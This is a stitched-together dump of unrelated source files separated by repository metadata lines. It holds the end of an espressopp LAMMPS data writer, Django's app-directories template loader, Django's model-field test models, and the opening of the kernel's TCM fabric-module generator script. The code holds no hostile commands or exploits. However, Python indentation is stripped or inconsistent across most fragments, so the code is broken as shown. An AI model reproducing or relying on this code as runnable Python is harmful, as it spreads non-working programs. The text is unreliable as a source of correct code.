file.write('%5d dihedral types\n' % ndihedraltypes)
file.write('%5d improper types\n\n' % 0)
file.write('%.4f %.4f xlo xhi\n' % (0.0, box_x))
file.write('%.4f %.4f ylo yhi\n' % (0.0, box_y))
file.write('%.4f %.4f zlo zhi\n' % (0.0, box_z))
file.write('\nAtoms\n\n');
pid = 0
    while pid <= maxParticleID:
        if system.storage.particleExists(pid):
            particle = system.storage.getParticle(pid)
            p = system.bc.getUnfoldedPosition(particle.pos, particle.imageBox)
            xpos = p[0]
            ypos = p[1]
            zpos = p[2]
            type = particle.type
            # we don't support molecule tags yet
            molecule_tag = (pid-1) / 200 + 1
            st = "%d %d %d %.3f %.3f %.3f\n" % (pid, molecule_tag, type+1, xpos, ypos, zpos)
            file.write(st)
        pid += 1
if writeVelocities:
file.write('\nVelocities\n\n');
pid = 0
        while pid <= maxParticleID:
            if system.storage.particleExists(pid):
                particle = system.storage.getParticle(pid)
                xvel = particle.v[0]
                yvel = particle.v[1]
                zvel = particle.v[2]
                st = "%d %15.10f %15.10f %15.10f\n" % (pid, xvel, yvel, zvel)
                file.write(st)
            pid += 1
if nbonds > 0:
file.write('\nBonds\n\n')
bn = 1
for i in xrange(len(bonds)):
for j in xrange(len(bonds[i])):
file.write('%d %d %d %d\n' % (bn, i+1, bonds[i][j][0], bonds[i][j][1]))
bn += 1
if nangles > 0:
file.write('\nAngles\n\n')
an = 1
for i in xrange(len(angles)):
for j in xrange(len(angles[i])):
file.write('%d %d %d %d %d\n' % (an, i+1, angles[i][j][1], angles[i][j][0], angles[i][j][2]))
an += 1
if ndihedrals > 0:
file.write('\nDihedrals\n\n')
dn = 1
for i in xrange(len(dihedrals)):
for j in xrange(len(dihedrals[i])):
file.write('%d %d %d %d %d %d\n' % (dn, i+1, dihedrals[i][j][0], dihedrals[i][j][1], dihedrals[i][j][2], dihedrals[i][j][3]))
dn += 1
file.close()
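# Usage sketch (hedged; assumes 'system' is an already populated
# espressopp.System and that this module is importable as
# espressopp.tools.lammps):
#
#   espressopp.tools.lammps.write('restart.data', system, writeVelocities=True)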
| gpl-3.0 |
atruberg/django-custom | django/template/loaders/app_directories.py | 105 | 2354 | """
Wrapper for loading templates from "templates" directories in INSTALLED_APPS
packages.
"""
import os
import sys
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.template.base import TemplateDoesNotExist
from django.template.loader import BaseLoader
from django.utils._os import safe_join
from django.utils.importlib import import_module
from django.utils import six
# At compile time, cache the directories to search.
if six.PY2:
fs_encoding = sys.getfilesystemencoding() or sys.getdefaultencoding()
app_template_dirs = []
for app in settings.INSTALLED_APPS:
try:
mod = import_module(app)
except ImportError as e:
raise ImproperlyConfigured('ImportError %s: %s' % (app, e.args[0]))
template_dir = os.path.join(os.path.dirname(mod.__file__), 'templates')
if os.path.isdir(template_dir):
if six.PY2:
template_dir = template_dir.decode(fs_encoding)
app_template_dirs.append(template_dir)
# It won't change, so convert it to a tuple to save memory.
app_template_dirs = tuple(app_template_dirs)
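# Illustrative configuration (a hedged example for the Django versions this
# loader targets): with
#
#   TEMPLATE_LOADERS = (
#       'django.template.loaders.filesystem.Loader',
#       'django.template.loaders.app_directories.Loader',
#   )
#
# in settings, a name like "polls/index.html" is resolved against each
# installed app's templates/ directory, in INSTALLED_APPS order.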
class Loader(BaseLoader):
is_usable = True
def get_template_sources(self, template_name, template_dirs=None):
"""
Returns the absolute paths to "template_name", when appended to each
directory in "template_dirs". Any paths that don't lie inside one of the
template dirs are excluded from the result set, for security reasons.
"""
if not template_dirs:
template_dirs = app_template_dirs
for template_dir in template_dirs:
try:
yield safe_join(template_dir, template_name)
except UnicodeDecodeError:
# The template dir name was a bytestring that wasn't valid UTF-8.
raise
except ValueError:
# The joined path was located outside of template_dir.
pass
def load_template_source(self, template_name, template_dirs=None):
for filepath in self.get_template_sources(template_name, template_dirs):
try:
with open(filepath, 'rb') as fp:
return (fp.read().decode(settings.FILE_CHARSET), filepath)
except IOError:
pass
raise TemplateDoesNotExist(template_name)
| bsd-3-clause |
fenginx/django | tests/model_fields/models.py | 12 | 12373 | import os
import tempfile
import uuid
from django.contrib.contenttypes.fields import (
GenericForeignKey, GenericRelation,
)
from django.contrib.contenttypes.models import ContentType
from django.core.files.storage import FileSystemStorage
from django.db import models
from django.db.models.fields.files import ImageField, ImageFieldFile
from django.db.models.fields.related import (
ForeignKey, ForeignObject, ManyToManyField, OneToOneField,
)
from django.utils.translation import gettext_lazy as _
try:
from PIL import Image
except ImportError:
Image = None
class Foo(models.Model):
a = models.CharField(max_length=10)
d = models.DecimalField(max_digits=5, decimal_places=3)
def get_foo():
return Foo.objects.get(id=1).pk
class Bar(models.Model):
b = models.CharField(max_length=10)
a = models.ForeignKey(Foo, models.CASCADE, default=get_foo, related_name='bars')
class Whiz(models.Model):
CHOICES = (
('Group 1', (
(1, 'First'),
(2, 'Second'),
)
),
('Group 2', (
(3, 'Third'),
(4, 'Fourth'),
)
),
(0, 'Other'),
(5, _('translated')),
)
c = models.IntegerField(choices=CHOICES, null=True)
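# Hedged illustration of the grouped choices above: the group labels only
# affect widget rendering, so Whiz(c=1).get_c_display() returns 'First' and
# 'Group 1' never appears as a display value.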
class WhizDelayed(models.Model):
c = models.IntegerField(choices=(), null=True)
# Contrived way of adding choices later.
WhizDelayed._meta.get_field('c').choices = Whiz.CHOICES
class WhizIter(models.Model):
c = models.IntegerField(choices=iter(Whiz.CHOICES), null=True)
class WhizIterEmpty(models.Model):
c = models.CharField(choices=iter(()), blank=True, max_length=1)
class Choiceful(models.Model):
no_choices = models.IntegerField(null=True)
empty_choices = models.IntegerField(choices=(), null=True)
with_choices = models.IntegerField(choices=[(1, 'A')], null=True)
empty_choices_bool = models.BooleanField(choices=())
empty_choices_text = models.TextField(choices=())
class BigD(models.Model):
d = models.DecimalField(max_digits=32, decimal_places=30)
class FloatModel(models.Model):
size = models.FloatField()
class BigS(models.Model):
s = models.SlugField(max_length=255)
class UnicodeSlugField(models.Model):
s = models.SlugField(max_length=255, allow_unicode=True)
class SmallIntegerModel(models.Model):
value = models.SmallIntegerField()
class IntegerModel(models.Model):
value = models.IntegerField()
class BigIntegerModel(models.Model):
value = models.BigIntegerField()
null_value = models.BigIntegerField(null=True, blank=True)
class PositiveSmallIntegerModel(models.Model):
value = models.PositiveSmallIntegerField()
class PositiveIntegerModel(models.Model):
value = models.PositiveIntegerField()
class Post(models.Model):
title = models.CharField(max_length=100)
body = models.TextField()
class NullBooleanModel(models.Model):
nbfield = models.BooleanField(null=True, blank=True)
nbfield_old = models.NullBooleanField()
class BooleanModel(models.Model):
bfield = models.BooleanField()
string = models.CharField(max_length=10, default='abc')
class DateTimeModel(models.Model):
d = models.DateField()
dt = models.DateTimeField()
t = models.TimeField()
class DurationModel(models.Model):
field = models.DurationField()
class NullDurationModel(models.Model):
field = models.DurationField(null=True)
class PrimaryKeyCharModel(models.Model):
string = models.CharField(max_length=10, primary_key=True)
class FksToBooleans(models.Model):
"""Model with FKs to models with {Null,}BooleanField's, #15040"""
bf = models.ForeignKey(BooleanModel, models.CASCADE)
nbf = models.ForeignKey(NullBooleanModel, models.CASCADE)
class FkToChar(models.Model):
"""Model with FK to a model with a CharField primary key, #19299"""
out = models.ForeignKey(PrimaryKeyCharModel, models.CASCADE)
class RenamedField(models.Model):
modelname = models.IntegerField(name="fieldname", choices=((1, 'One'),))
class VerboseNameField(models.Model):
id = models.AutoField("verbose pk", primary_key=True)
field1 = models.BigIntegerField("verbose field1")
field2 = models.BooleanField("verbose field2", default=False)
field3 = models.CharField("verbose field3", max_length=10)
field4 = models.DateField("verbose field4")
field5 = models.DateTimeField("verbose field5")
field6 = models.DecimalField("verbose field6", max_digits=6, decimal_places=1)
field7 = models.EmailField("verbose field7")
field8 = models.FileField("verbose field8", upload_to="unused")
field9 = models.FilePathField("verbose field9")
field10 = models.FloatField("verbose field10")
# Don't want to depend on Pillow in this test
# field_image = models.ImageField("verbose field")
field11 = models.IntegerField("verbose field11")
field12 = models.GenericIPAddressField("verbose field12", protocol="ipv4")
field13 = models.NullBooleanField("verbose field13")
field14 = models.PositiveIntegerField("verbose field14")
field15 = models.PositiveSmallIntegerField("verbose field15")
field16 = models.SlugField("verbose field16")
field17 = models.SmallIntegerField("verbose field17")
field18 = models.TextField("verbose field18")
field19 = models.TimeField("verbose field19")
field20 = models.URLField("verbose field20")
field21 = models.UUIDField("verbose field21")
field22 = models.DurationField("verbose field22")
class GenericIPAddress(models.Model):
ip = models.GenericIPAddressField(null=True, protocol='ipv4')
###############################################################################
# These models aren't used in any test, just here to ensure they validate
# successfully.
# See ticket #16570.
class DecimalLessThanOne(models.Model):
d = models.DecimalField(max_digits=3, decimal_places=3)
# See ticket #18389.
class FieldClassAttributeModel(models.Model):
field_class = models.CharField
###############################################################################
class DataModel(models.Model):
short_data = models.BinaryField(max_length=10, default=b'\x08')
data = models.BinaryField()
###############################################################################
# FileField
class Document(models.Model):
myfile = models.FileField(upload_to='unused', unique=True)
###############################################################################
# ImageField
# If Pillow available, do these tests.
if Image:
class TestImageFieldFile(ImageFieldFile):
"""
Custom Field File class that records whether or not the underlying file
was opened.
"""
def __init__(self, *args, **kwargs):
self.was_opened = False
super().__init__(*args, **kwargs)
def open(self):
self.was_opened = True
super().open()
class TestImageField(ImageField):
attr_class = TestImageFieldFile
# Set up a temp directory for file storage.
temp_storage_dir = tempfile.mkdtemp()
temp_storage = FileSystemStorage(temp_storage_dir)
temp_upload_to_dir = os.path.join(temp_storage.location, 'tests')
class Person(models.Model):
"""
Model that defines an ImageField with no dimension fields.
"""
name = models.CharField(max_length=50)
mugshot = TestImageField(storage=temp_storage, upload_to='tests')
class AbstractPersonWithHeight(models.Model):
"""
Abstract model that defines an ImageField with only one dimension field
to make sure the dimension update is correctly run on concrete subclass
        instances post-initialization.
"""
mugshot = TestImageField(storage=temp_storage, upload_to='tests',
height_field='mugshot_height')
mugshot_height = models.PositiveSmallIntegerField()
class Meta:
abstract = True
class PersonWithHeight(AbstractPersonWithHeight):
"""
        Concrete model that subclasses an abstract one with only one dimension
field.
"""
name = models.CharField(max_length=50)
class PersonWithHeightAndWidth(models.Model):
"""
Model that defines height and width fields after the ImageField.
"""
name = models.CharField(max_length=50)
mugshot = TestImageField(storage=temp_storage, upload_to='tests',
height_field='mugshot_height',
width_field='mugshot_width')
mugshot_height = models.PositiveSmallIntegerField()
mugshot_width = models.PositiveSmallIntegerField()
class PersonDimensionsFirst(models.Model):
"""
Model that defines height and width fields before the ImageField.
"""
name = models.CharField(max_length=50)
mugshot_height = models.PositiveSmallIntegerField()
mugshot_width = models.PositiveSmallIntegerField()
mugshot = TestImageField(storage=temp_storage, upload_to='tests',
height_field='mugshot_height',
width_field='mugshot_width')
class PersonTwoImages(models.Model):
"""
Model that:
* Defines two ImageFields
* Defines the height/width fields before the ImageFields
* Has a nullable ImageField
"""
name = models.CharField(max_length=50)
mugshot_height = models.PositiveSmallIntegerField()
mugshot_width = models.PositiveSmallIntegerField()
mugshot = TestImageField(storage=temp_storage, upload_to='tests',
height_field='mugshot_height',
width_field='mugshot_width')
headshot_height = models.PositiveSmallIntegerField(
blank=True, null=True)
headshot_width = models.PositiveSmallIntegerField(
blank=True, null=True)
headshot = TestImageField(blank=True, null=True,
storage=temp_storage, upload_to='tests',
height_field='headshot_height',
width_field='headshot_width')
class AllFieldsModel(models.Model):
big_integer = models.BigIntegerField()
binary = models.BinaryField()
boolean = models.BooleanField(default=False)
char = models.CharField(max_length=10)
date = models.DateField()
datetime = models.DateTimeField()
decimal = models.DecimalField(decimal_places=2, max_digits=2)
duration = models.DurationField()
email = models.EmailField()
file_path = models.FilePathField()
floatf = models.FloatField()
integer = models.IntegerField()
generic_ip = models.GenericIPAddressField()
null_boolean = models.NullBooleanField()
positive_integer = models.PositiveIntegerField()
positive_small_integer = models.PositiveSmallIntegerField()
slug = models.SlugField()
small_integer = models.SmallIntegerField()
text = models.TextField()
time = models.TimeField()
url = models.URLField()
uuid = models.UUIDField()
fo = ForeignObject(
'self',
on_delete=models.CASCADE,
from_fields=['positive_integer'],
to_fields=['id'],
related_name='reverse'
)
fk = ForeignKey(
'self',
models.CASCADE,
related_name='reverse2'
)
m2m = ManyToManyField('self')
oto = OneToOneField('self', models.CASCADE)
object_id = models.PositiveIntegerField()
content_type = models.ForeignKey(ContentType, models.CASCADE)
gfk = GenericForeignKey()
gr = GenericRelation(DataModel)
class ManyToMany(models.Model):
m2m = models.ManyToManyField('self')
###############################################################################
class UUIDModel(models.Model):
field = models.UUIDField()
class NullableUUIDModel(models.Model):
field = models.UUIDField(blank=True, null=True)
class PrimaryKeyUUIDModel(models.Model):
id = models.UUIDField(primary_key=True, default=uuid.uuid4)
class RelatedToUUIDModel(models.Model):
uuid_fk = models.ForeignKey('PrimaryKeyUUIDModel', models.CASCADE)
class UUIDChild(PrimaryKeyUUIDModel):
pass
class UUIDGrandchild(UUIDChild):
pass
| bsd-3-clause |
TeamOrion-Devices/kernel_htc_msm8974 | Documentation/target/tcm_mod_builder.py | 4981 | 41422 | #!/usr/bin/python
# The TCM v4 multi-protocol fabric module generation script for drivers/target/$NEW_MOD
#
# Copyright (c) 2010 Rising Tide Systems
# Copyright (c) 2010 Linux-iSCSI.org
#
# Author: [email protected]
#
import os, sys
import subprocess as sub
import string
import re
import optparse
tcm_dir = ""
fabric_ops = []
fabric_mod_dir = ""
fabric_mod_port = ""
fabric_mod_init_port = ""
def tcm_mod_err(msg):
print msg
sys.exit(1)
def tcm_mod_create_module_subdir(fabric_mod_dir_var):
	if os.path.isdir(fabric_mod_dir_var):
		return 1
	print "Creating fabric_mod_dir: " + fabric_mod_dir_var
	# os.mkdir() raises OSError on failure (its return value is always None),
	# so trap the exception rather than testing the result.
	try:
		os.mkdir(fabric_mod_dir_var)
	except OSError:
		tcm_mod_err("Unable to mkdir " + fabric_mod_dir_var)
	return
def tcm_mod_build_FC_include(fabric_mod_dir_var, fabric_mod_name):
global fabric_mod_port
global fabric_mod_init_port
buf = ""
f = fabric_mod_dir_var + "/" + fabric_mod_name + "_base.h"
print "Writing file: " + f
p = open(f, 'w');
if not p:
tcm_mod_err("Unable to open file: " + f)
buf = "#define " + fabric_mod_name.upper() + "_VERSION \"v0.1\"\n"
buf += "#define " + fabric_mod_name.upper() + "_NAMELEN 32\n"
buf += "\n"
buf += "struct " + fabric_mod_name + "_nacl {\n"
buf += " /* Binary World Wide unique Port Name for FC Initiator Nport */\n"
buf += " u64 nport_wwpn;\n"
buf += " /* ASCII formatted WWPN for FC Initiator Nport */\n"
buf += " char nport_name[" + fabric_mod_name.upper() + "_NAMELEN];\n"
buf += " /* Returned by " + fabric_mod_name + "_make_nodeacl() */\n"
buf += " struct se_node_acl se_node_acl;\n"
buf += "};\n"
buf += "\n"
buf += "struct " + fabric_mod_name + "_tpg {\n"
buf += " /* FC lport target portal group tag for TCM */\n"
buf += " u16 lport_tpgt;\n"
buf += " /* Pointer back to " + fabric_mod_name + "_lport */\n"
buf += " struct " + fabric_mod_name + "_lport *lport;\n"
buf += " /* Returned by " + fabric_mod_name + "_make_tpg() */\n"
buf += " struct se_portal_group se_tpg;\n"
buf += "};\n"
buf += "\n"
buf += "struct " + fabric_mod_name + "_lport {\n"
buf += " /* SCSI protocol the lport is providing */\n"
buf += " u8 lport_proto_id;\n"
buf += " /* Binary World Wide unique Port Name for FC Target Lport */\n"
buf += " u64 lport_wwpn;\n"
buf += " /* ASCII formatted WWPN for FC Target Lport */\n"
buf += " char lport_name[" + fabric_mod_name.upper() + "_NAMELEN];\n"
buf += " /* Returned by " + fabric_mod_name + "_make_lport() */\n"
buf += " struct se_wwn lport_wwn;\n"
buf += "};\n"
ret = p.write(buf)
if ret:
tcm_mod_err("Unable to write f: " + f)
p.close()
fabric_mod_port = "lport"
fabric_mod_init_port = "nport"
return
def tcm_mod_build_SAS_include(fabric_mod_dir_var, fabric_mod_name):
global fabric_mod_port
global fabric_mod_init_port
buf = ""
f = fabric_mod_dir_var + "/" + fabric_mod_name + "_base.h"
print "Writing file: " + f
p = open(f, 'w');
if not p:
tcm_mod_err("Unable to open file: " + f)
buf = "#define " + fabric_mod_name.upper() + "_VERSION \"v0.1\"\n"
buf += "#define " + fabric_mod_name.upper() + "_NAMELEN 32\n"
buf += "\n"
buf += "struct " + fabric_mod_name + "_nacl {\n"
buf += " /* Binary World Wide unique Port Name for SAS Initiator port */\n"
buf += " u64 iport_wwpn;\n"
buf += " /* ASCII formatted WWPN for Sas Initiator port */\n"
buf += " char iport_name[" + fabric_mod_name.upper() + "_NAMELEN];\n"
buf += " /* Returned by " + fabric_mod_name + "_make_nodeacl() */\n"
buf += " struct se_node_acl se_node_acl;\n"
buf += "};\n\n"
buf += "struct " + fabric_mod_name + "_tpg {\n"
buf += " /* SAS port target portal group tag for TCM */\n"
buf += " u16 tport_tpgt;\n"
buf += " /* Pointer back to " + fabric_mod_name + "_tport */\n"
buf += " struct " + fabric_mod_name + "_tport *tport;\n"
buf += " /* Returned by " + fabric_mod_name + "_make_tpg() */\n"
buf += " struct se_portal_group se_tpg;\n"
buf += "};\n\n"
buf += "struct " + fabric_mod_name + "_tport {\n"
buf += " /* SCSI protocol the tport is providing */\n"
buf += " u8 tport_proto_id;\n"
buf += " /* Binary World Wide unique Port Name for SAS Target port */\n"
buf += " u64 tport_wwpn;\n"
buf += " /* ASCII formatted WWPN for SAS Target port */\n"
buf += " char tport_name[" + fabric_mod_name.upper() + "_NAMELEN];\n"
buf += " /* Returned by " + fabric_mod_name + "_make_tport() */\n"
buf += " struct se_wwn tport_wwn;\n"
buf += "};\n"
ret = p.write(buf)
if ret:
tcm_mod_err("Unable to write f: " + f)
p.close()
fabric_mod_port = "tport"
fabric_mod_init_port = "iport"
return
def tcm_mod_build_iSCSI_include(fabric_mod_dir_var, fabric_mod_name):
global fabric_mod_port
global fabric_mod_init_port
buf = ""
f = fabric_mod_dir_var + "/" + fabric_mod_name + "_base.h"
print "Writing file: " + f
p = open(f, 'w');
if not p:
tcm_mod_err("Unable to open file: " + f)
buf = "#define " + fabric_mod_name.upper() + "_VERSION \"v0.1\"\n"
buf += "#define " + fabric_mod_name.upper() + "_NAMELEN 32\n"
buf += "\n"
buf += "struct " + fabric_mod_name + "_nacl {\n"
buf += " /* ASCII formatted InitiatorName */\n"
buf += " char iport_name[" + fabric_mod_name.upper() + "_NAMELEN];\n"
buf += " /* Returned by " + fabric_mod_name + "_make_nodeacl() */\n"
buf += " struct se_node_acl se_node_acl;\n"
buf += "};\n\n"
buf += "struct " + fabric_mod_name + "_tpg {\n"
buf += " /* iSCSI target portal group tag for TCM */\n"
buf += " u16 tport_tpgt;\n"
buf += " /* Pointer back to " + fabric_mod_name + "_tport */\n"
buf += " struct " + fabric_mod_name + "_tport *tport;\n"
buf += " /* Returned by " + fabric_mod_name + "_make_tpg() */\n"
buf += " struct se_portal_group se_tpg;\n"
buf += "};\n\n"
buf += "struct " + fabric_mod_name + "_tport {\n"
buf += " /* SCSI protocol the tport is providing */\n"
buf += " u8 tport_proto_id;\n"
buf += " /* ASCII formatted TargetName for IQN */\n"
buf += " char tport_name[" + fabric_mod_name.upper() + "_NAMELEN];\n"
buf += " /* Returned by " + fabric_mod_name + "_make_tport() */\n"
buf += " struct se_wwn tport_wwn;\n"
buf += "};\n"
ret = p.write(buf)
if ret:
tcm_mod_err("Unable to write f: " + f)
p.close()
fabric_mod_port = "tport"
fabric_mod_init_port = "iport"
return
def tcm_mod_build_base_includes(proto_ident, fabric_mod_dir_val, fabric_mod_name):
if proto_ident == "FC":
tcm_mod_build_FC_include(fabric_mod_dir_val, fabric_mod_name)
elif proto_ident == "SAS":
tcm_mod_build_SAS_include(fabric_mod_dir_val, fabric_mod_name)
elif proto_ident == "iSCSI":
tcm_mod_build_iSCSI_include(fabric_mod_dir_val, fabric_mod_name)
else:
print "Unsupported proto_ident: " + proto_ident
sys.exit(1)
return
def tcm_mod_build_configfs(proto_ident, fabric_mod_dir_var, fabric_mod_name):
buf = ""
f = fabric_mod_dir_var + "/" + fabric_mod_name + "_configfs.c"
print "Writing file: " + f
p = open(f, 'w');
if not p:
tcm_mod_err("Unable to open file: " + f)
buf = "#include <linux/module.h>\n"
buf += "#include <linux/moduleparam.h>\n"
buf += "#include <linux/version.h>\n"
buf += "#include <generated/utsrelease.h>\n"
buf += "#include <linux/utsname.h>\n"
buf += "#include <linux/init.h>\n"
buf += "#include <linux/slab.h>\n"
buf += "#include <linux/kthread.h>\n"
buf += "#include <linux/types.h>\n"
buf += "#include <linux/string.h>\n"
buf += "#include <linux/configfs.h>\n"
buf += "#include <linux/ctype.h>\n"
buf += "#include <asm/unaligned.h>\n\n"
buf += "#include <target/target_core_base.h>\n"
buf += "#include <target/target_core_fabric.h>\n"
buf += "#include <target/target_core_fabric_configfs.h>\n"
buf += "#include <target/target_core_configfs.h>\n"
buf += "#include <target/configfs_macros.h>\n\n"
buf += "#include \"" + fabric_mod_name + "_base.h\"\n"
buf += "#include \"" + fabric_mod_name + "_fabric.h\"\n\n"
buf += "/* Local pointer to allocated TCM configfs fabric module */\n"
buf += "struct target_fabric_configfs *" + fabric_mod_name + "_fabric_configfs;\n\n"
buf += "static struct se_node_acl *" + fabric_mod_name + "_make_nodeacl(\n"
buf += " struct se_portal_group *se_tpg,\n"
buf += " struct config_group *group,\n"
buf += " const char *name)\n"
buf += "{\n"
buf += " struct se_node_acl *se_nacl, *se_nacl_new;\n"
buf += " struct " + fabric_mod_name + "_nacl *nacl;\n"
if proto_ident == "FC" or proto_ident == "SAS":
buf += " u64 wwpn = 0;\n"
buf += " u32 nexus_depth;\n\n"
buf += " /* " + fabric_mod_name + "_parse_wwn(name, &wwpn, 1) < 0)\n"
buf += " return ERR_PTR(-EINVAL); */\n"
buf += " se_nacl_new = " + fabric_mod_name + "_alloc_fabric_acl(se_tpg);\n"
buf += " if (!se_nacl_new)\n"
buf += " return ERR_PTR(-ENOMEM);\n"
buf += "//#warning FIXME: Hardcoded nexus depth in " + fabric_mod_name + "_make_nodeacl()\n"
buf += " nexus_depth = 1;\n"
buf += " /*\n"
buf += " * se_nacl_new may be released by core_tpg_add_initiator_node_acl()\n"
buf += " * when converting a NodeACL from demo mode -> explict\n"
buf += " */\n"
buf += " se_nacl = core_tpg_add_initiator_node_acl(se_tpg, se_nacl_new,\n"
buf += " name, nexus_depth);\n"
buf += " if (IS_ERR(se_nacl)) {\n"
buf += " " + fabric_mod_name + "_release_fabric_acl(se_tpg, se_nacl_new);\n"
buf += " return se_nacl;\n"
buf += " }\n"
buf += " /*\n"
buf += " * Locate our struct " + fabric_mod_name + "_nacl and set the FC Nport WWPN\n"
buf += " */\n"
buf += " nacl = container_of(se_nacl, struct " + fabric_mod_name + "_nacl, se_node_acl);\n"
if proto_ident == "FC" or proto_ident == "SAS":
buf += " nacl->" + fabric_mod_init_port + "_wwpn = wwpn;\n"
buf += " /* " + fabric_mod_name + "_format_wwn(&nacl->" + fabric_mod_init_port + "_name[0], " + fabric_mod_name.upper() + "_NAMELEN, wwpn); */\n\n"
buf += " return se_nacl;\n"
buf += "}\n\n"
buf += "static void " + fabric_mod_name + "_drop_nodeacl(struct se_node_acl *se_acl)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_nacl *nacl = container_of(se_acl,\n"
buf += " struct " + fabric_mod_name + "_nacl, se_node_acl);\n"
buf += " core_tpg_del_initiator_node_acl(se_acl->se_tpg, se_acl, 1);\n"
buf += " kfree(nacl);\n"
buf += "}\n\n"
buf += "static struct se_portal_group *" + fabric_mod_name + "_make_tpg(\n"
buf += " struct se_wwn *wwn,\n"
buf += " struct config_group *group,\n"
buf += " const char *name)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + "*" + fabric_mod_port + " = container_of(wwn,\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + ", " + fabric_mod_port + "_wwn);\n\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg;\n"
buf += " unsigned long tpgt;\n"
buf += " int ret;\n\n"
buf += " if (strstr(name, \"tpgt_\") != name)\n"
buf += " return ERR_PTR(-EINVAL);\n"
buf += " if (strict_strtoul(name + 5, 10, &tpgt) || tpgt > UINT_MAX)\n"
buf += " return ERR_PTR(-EINVAL);\n\n"
buf += " tpg = kzalloc(sizeof(struct " + fabric_mod_name + "_tpg), GFP_KERNEL);\n"
buf += " if (!tpg) {\n"
buf += " printk(KERN_ERR \"Unable to allocate struct " + fabric_mod_name + "_tpg\");\n"
buf += " return ERR_PTR(-ENOMEM);\n"
buf += " }\n"
buf += " tpg->" + fabric_mod_port + " = " + fabric_mod_port + ";\n"
buf += " tpg->" + fabric_mod_port + "_tpgt = tpgt;\n\n"
buf += " ret = core_tpg_register(&" + fabric_mod_name + "_fabric_configfs->tf_ops, wwn,\n"
buf += " &tpg->se_tpg, (void *)tpg,\n"
buf += " TRANSPORT_TPG_TYPE_NORMAL);\n"
buf += " if (ret < 0) {\n"
buf += " kfree(tpg);\n"
buf += " return NULL;\n"
buf += " }\n"
buf += " return &tpg->se_tpg;\n"
buf += "}\n\n"
buf += "static void " + fabric_mod_name + "_drop_tpg(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n\n"
buf += " core_tpg_deregister(se_tpg);\n"
buf += " kfree(tpg);\n"
buf += "}\n\n"
buf += "static struct se_wwn *" + fabric_mod_name + "_make_" + fabric_mod_port + "(\n"
buf += " struct target_fabric_configfs *tf,\n"
buf += " struct config_group *group,\n"
buf += " const char *name)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + ";\n"
if proto_ident == "FC" or proto_ident == "SAS":
buf += " u64 wwpn = 0;\n\n"
buf += " /* if (" + fabric_mod_name + "_parse_wwn(name, &wwpn, 1) < 0)\n"
buf += " return ERR_PTR(-EINVAL); */\n\n"
buf += " " + fabric_mod_port + " = kzalloc(sizeof(struct " + fabric_mod_name + "_" + fabric_mod_port + "), GFP_KERNEL);\n"
buf += " if (!" + fabric_mod_port + ") {\n"
buf += " printk(KERN_ERR \"Unable to allocate struct " + fabric_mod_name + "_" + fabric_mod_port + "\");\n"
buf += " return ERR_PTR(-ENOMEM);\n"
buf += " }\n"
if proto_ident == "FC" or proto_ident == "SAS":
buf += " " + fabric_mod_port + "->" + fabric_mod_port + "_wwpn = wwpn;\n"
buf += " /* " + fabric_mod_name + "_format_wwn(&" + fabric_mod_port + "->" + fabric_mod_port + "_name[0], " + fabric_mod_name.upper() + "_NAMELEN, wwpn); */\n\n"
buf += " return &" + fabric_mod_port + "->" + fabric_mod_port + "_wwn;\n"
buf += "}\n\n"
buf += "static void " + fabric_mod_name + "_drop_" + fabric_mod_port + "(struct se_wwn *wwn)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + " = container_of(wwn,\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + ", " + fabric_mod_port + "_wwn);\n"
buf += " kfree(" + fabric_mod_port + ");\n"
buf += "}\n\n"
buf += "static ssize_t " + fabric_mod_name + "_wwn_show_attr_version(\n"
buf += " struct target_fabric_configfs *tf,\n"
buf += " char *page)\n"
buf += "{\n"
buf += " return sprintf(page, \"" + fabric_mod_name.upper() + " fabric module %s on %s/%s\"\n"
buf += " \"on \"UTS_RELEASE\"\\n\", " + fabric_mod_name.upper() + "_VERSION, utsname()->sysname,\n"
buf += " utsname()->machine);\n"
buf += "}\n\n"
buf += "TF_WWN_ATTR_RO(" + fabric_mod_name + ", version);\n\n"
buf += "static struct configfs_attribute *" + fabric_mod_name + "_wwn_attrs[] = {\n"
buf += " &" + fabric_mod_name + "_wwn_version.attr,\n"
buf += " NULL,\n"
buf += "};\n\n"
buf += "static struct target_core_fabric_ops " + fabric_mod_name + "_ops = {\n"
buf += " .get_fabric_name = " + fabric_mod_name + "_get_fabric_name,\n"
buf += " .get_fabric_proto_ident = " + fabric_mod_name + "_get_fabric_proto_ident,\n"
buf += " .tpg_get_wwn = " + fabric_mod_name + "_get_fabric_wwn,\n"
buf += " .tpg_get_tag = " + fabric_mod_name + "_get_tag,\n"
buf += " .tpg_get_default_depth = " + fabric_mod_name + "_get_default_depth,\n"
buf += " .tpg_get_pr_transport_id = " + fabric_mod_name + "_get_pr_transport_id,\n"
buf += " .tpg_get_pr_transport_id_len = " + fabric_mod_name + "_get_pr_transport_id_len,\n"
buf += " .tpg_parse_pr_out_transport_id = " + fabric_mod_name + "_parse_pr_out_transport_id,\n"
buf += " .tpg_check_demo_mode = " + fabric_mod_name + "_check_false,\n"
buf += " .tpg_check_demo_mode_cache = " + fabric_mod_name + "_check_true,\n"
buf += " .tpg_check_demo_mode_write_protect = " + fabric_mod_name + "_check_true,\n"
buf += " .tpg_check_prod_mode_write_protect = " + fabric_mod_name + "_check_false,\n"
buf += " .tpg_alloc_fabric_acl = " + fabric_mod_name + "_alloc_fabric_acl,\n"
buf += " .tpg_release_fabric_acl = " + fabric_mod_name + "_release_fabric_acl,\n"
buf += " .tpg_get_inst_index = " + fabric_mod_name + "_tpg_get_inst_index,\n"
buf += " .release_cmd = " + fabric_mod_name + "_release_cmd,\n"
buf += " .shutdown_session = " + fabric_mod_name + "_shutdown_session,\n"
buf += " .close_session = " + fabric_mod_name + "_close_session,\n"
buf += " .stop_session = " + fabric_mod_name + "_stop_session,\n"
buf += " .fall_back_to_erl0 = " + fabric_mod_name + "_reset_nexus,\n"
